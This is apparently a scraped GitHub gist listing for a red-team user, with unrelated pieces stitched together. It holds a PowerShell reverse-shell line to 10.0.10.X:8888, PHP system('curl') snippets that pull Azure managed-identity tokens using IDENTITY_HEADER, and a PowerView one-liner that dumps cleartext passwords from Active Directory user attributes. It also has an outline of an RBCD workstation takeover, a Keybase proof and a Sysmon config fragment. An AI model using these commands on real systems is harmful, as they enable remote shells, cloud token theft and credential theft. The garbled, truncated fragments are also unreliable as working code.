#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail
echo "[*] Creating temporary directory..."
TMPDIR="$(mktemp -d --suffix=_bloodhound-customqueries)"
# Compass BloodHound Customqueries
iex (New-Object
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.10.X -Port 8888
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) Version/15.3 Safari/605.1.15 Edg/100.0.4896.127
C0axx / Get-GraphToken.php
Created January 3, 2023 18:16
Request access tokens for Azure Graph services
system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');
C0axx / Get-VaultToken.php
Last active January 3, 2023 18:28
Request Azure Keyvault Token
system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');
C0axx / Get-ManagementToken.php
Last active January 3, 2023 18:16
Request access tokens for Azure Management services
system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');
C0axx / gist:334294bafa7bd83cc9625fc1cfe71a2a
Created October 29, 2022 19:36 — forked from dafthack/gist:5f8c36f7468fad991e9e1f6d81ec29d4
PowerView One-Liner to Dump Cleartext Passwords From AD User Attributes
$users = Get-NetUser; $props=@(); $users | Get-Member | foreach-object{if($_.Name -notlike "badpassword*"){$props+=$_.Name}}; foreach($user in $users){ foreach($prop in $props){ if($user.$prop -like "*password*" -and $user.$prop -notlike "*dont_expire_password" -and $user.$prop -notlike "*RODC Password*"){Write-Output ($user.samAccountName + "[" + $prop + "]" + " : " + $user.$prop) } } }
C0axx /
Created September 25, 2022 00:17 — forked from mgeeky/
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished, in short, by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

Keybase proof

I hereby claim:

  • I am c0axx on github.
  • I am c0axx ( on keybase.
  • I have a public key ASCQzho6XeMDopSCjSDM6aK-1ZgLmvNSEWiFP0b3BwHI-Ao

To claim this, I am signing this object:

<Sysmon schemaversion="4.50">
<!-- This now also determines the file names of the files preserved (String) -->
<CheckRevocation />
<!-- Disables lookup behavior, default is True (Boolean) -->
<!-- Sets the name of the directory in the C:\ root where preserved files will be saved (String)-->
<CaptureClipboard />
<!--This enables capturing the Clipboard changes-->